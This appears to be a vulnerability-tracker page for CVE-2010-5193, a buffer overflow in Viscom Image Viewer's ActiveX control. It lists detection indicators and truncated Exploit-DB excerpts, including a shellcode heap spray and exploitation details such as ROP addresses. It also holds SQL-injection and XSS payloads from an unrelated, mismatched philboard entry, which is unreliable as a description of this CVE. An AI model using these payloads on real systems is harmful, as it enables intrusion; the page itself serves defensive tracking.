CVE-2010-5193
Published: 2012-08-31
Priority: P2 · 59 · Severity: critical · CVSS 2.0 base score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: available · EPSS: 31.97% (98.1th percentile)
Stack-based buffer overflow in the TIFMergeMultiFiles function in the SCRIBBLE.ScribbleCtrl.1 ActiveX control (ImageViewer2.ocx) in Viscom Image Viewer CP Pro 8.0 and Gold 6.0 allows remote attackers to execute arbitrary code via a long strDelimit parameter.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| viscomsoft | image_viewer_cp_gold_sdk | — | — |
| viscomsoft | image_viewer_cp_pro_sdk | — | — |
Detection & IOCs (extracted from sources)
- Detect exploitation attempts by monitoring for instantiation of the SCRIBBLE.ScribbleCtrl.1 ActiveX control (ImageViewer2.ocx) combined with a long strDelimit parameter passed to TIFMergeMultiFiles/TifMergeMultiFiles.
- The Metasploit module targets User-Agent strings matching Windows XP (NT 5.1), Vista (NT 6.0), and Windows 7 (NT 6.1) with MSIE 6.0, 7.0, or 8.0; network detection should alert on exploit page delivery to these UA patterns.
- The DEP/ASLR bypass ROP chain for IE8/Vista/Win7 targets uses MSVCR71.dll ROP gadgets; presence of ROP gadget addresses from MSVCR71.dll (e.g., 0x7C37653D, 0x7C347F98) on the stack is a strong indicator of exploitation.
- The exploit uses a heap spray with an unescape NOP sled (%u9090%u9090) and encoded shellcode in JavaScript; IDS/IPS rules should look for the characteristic shellcode bytes in HTTP responses alongside ActiveX object instantiation of ImageViewer2.ocx.
- The exploit pivot address 0x12AE0FE4 is used as the return address overwrite; memory forensics or crash analysis showing EIP/saved return address set to this value indicates exploitation of this specific vulnerability.
- Post-exploitation, the Metasploit module auto-migrates the injected process; endpoint detection should monitor for unexpected child processes spawned from the browser (iexplore.exe) following ImageViewer2.ocx load.
- Exploitation requires the victim to explicitly trust the publisher 'Viscom Software' via an ActiveX trust prompt; exploitation will fail if the user denies the trust dialog.
- The DEP and ASLR bypass path (targets[2]) requires Java support to be present on the victim machine; without Java, the bypass will not function on Vista/Win7/XP IE8.
- The module is excluded from Metasploit autopwn automation due to the manual trust requirement.
- Payload bad characters are restricted to null bytes only (`\x00`); other characters are safe to use in shellcode.
No detection rules found.
Exploit-DB: Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control (Metasploit) · exploitdb · 2011-11-17 · CVE-2010-5194
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control',
'Description' => %q{
This module exploits a stack based buffer overflow in the Active control file
ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles()
method. Exploitation results in code execution with the privileges of the user who
browsed to the exploit page.
The victim will first be required to trust the publisher Viscom Softwa
```
Exploit-DB: Viscom Image Viewer CP Gold 6 - ActiveX 'TifMergeMultiFiles()' Remote Buffer Overflow · exploitdb · 2010-12-03 · CVE-2010-5193
---
```javascript
//payload is windows/exec cmd=calc.exe
shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');
nops=unescape('%u9090%u9090');
headersize =20;
slackspace= headersize + shellcode.length;
while(nops.length
```
Exploit-DB: W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting · exploitdb · 2008-06-27 · CVE-2008-5193
---
> [+] Script Name : philboard v 1.14 Multiple Remote Exploits
> |+| Team : InjEct0r5
> [+] Author : Bl@ckbe@rD ('Tunisian TerrorisT') ;
> [+] Contact : blackbeard-sql[A.T]hotmail{.}fr ;
> [+] Dork : Powered by v1.14 powered by philboard v1.14
> --//-->
> [+] Expl0iT :
> Remote SQL Injection :
> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]
> Blind Way : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00
> Remote XSS Exploit :
> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]
> [XSS] --> alert(document.cookie)
> # milw0rm.com [2008-06-27]
Metasploit: Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
This module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/42445
- http://www.exploit-db.com/exploits/15668
- http://www.exploit-db.com/exploits/18123
- https://exchange.xforce.ibmcloud.com/vulnerabilities/63666